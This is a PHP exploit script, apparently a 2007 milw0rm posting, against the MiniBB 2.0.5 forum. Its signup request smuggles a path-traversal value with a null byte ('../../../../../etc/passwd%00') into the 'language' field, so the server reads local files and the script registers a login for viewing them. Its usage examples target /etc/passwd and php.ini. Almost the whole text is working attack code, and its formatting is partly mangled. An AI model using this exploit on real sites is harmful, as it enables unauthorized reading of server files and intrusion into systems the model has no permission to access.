------------------------------------------------------------ --------- Portal : MiniBB 2.0.5 Download : https://tik.lat/QkEvR Author : Dj7xpl ------------------------------------------------------------ ---------*/// Print headerprint_r(' __________________________________________________ __________ ______________
- MiniBB Forum Version 2.0 Remote Exploit
- Vuln And Coded By Dj7xpl __________________________________________________ __________ ______________');// Print Usageif ($argc<4) {print_r(' __________________________________________________ __________ ______________Usage: php '.$argv[0].' host path File OPTIONShost: Target Ip Ro Hostnamepath: path to ForumFile: File For IncludeOptions: -p[port]: specify a port other than 80 -P[iport]: specify a proxyExamplehp '.$argv[0].' localhost /MiniBB/ ../../../../../etc/passwd -P1.1.1.1:80php '.$argv[0].' localhost /MiniBB/ ../../../../../windows/php.ini -p81 __________________________________________________ __________ ______________');die;}error_reporting(0);ini_set(" max_execution_time",0);ini_set("default_socket_tim eout",5);function quick_dump($string){ $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result;}$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';function sendpacketii($packet){ global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) { $html.=fread($ock,1); } } fclose($ock);}// argv$host=$argv[1];$path=$argv[2];$f=$argv[3];$port=80;$proxy="";for ($i=3; $i<$argc; $i++){$temp=$argv[$i][0].$argv[$i][1];if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}if ($temp=="-p"){ $port=str_replace("-p","",$argv[$i]);}if ($temp=="-P"){ $proxy=str_replace("-P","",$argv[$i]);}}if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}// Data$data='-----------------------------7d61bcd1f033eContent-Disposition: form-data; name="action";register-----------------------------7d61bcd1f033eContent-Disposition: form-data; name="login";dj7xpl-----------------------------7d61bcd1f033eContent-Disposition: form-data; name="passwd";dj7xpl-----------------------------7d61bcd1f033eContent-Disposition: form-data; name="passwd2";dj7xpl-----------------------------7d61bcd1f033eContent-Disposition: form-data; name="email";dj7xpl\@yahoo.com-----------------------------7d61bcd1f033eContent-Disposition: form-data; name="language";".$f."%00-----------------------------7d61bcd1f033eContent-Disposition: form-data; name="submit";New user signup-----------------------------7d61bcd1f033e--';// Send Data To Target $packet ="POST ".$path."index.php? HTTP/1.0\r\n";$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";$packet.="Host: ".$host."\r\n";$packet.="Content-Length: ".strlen($data)."\r\n";$packet.="Connection: close\r\n\r\n";$packet.=$data;sendpacketii($packet );sleep(1);// Print End MessagePrint "Exploit succeeded... \r\n";print "Go To Target And Login By This\r\nuser : dj7xpl / pass : dj7xpl and see file in your browser\r\n";?># milw0rm.com [2007-06-17]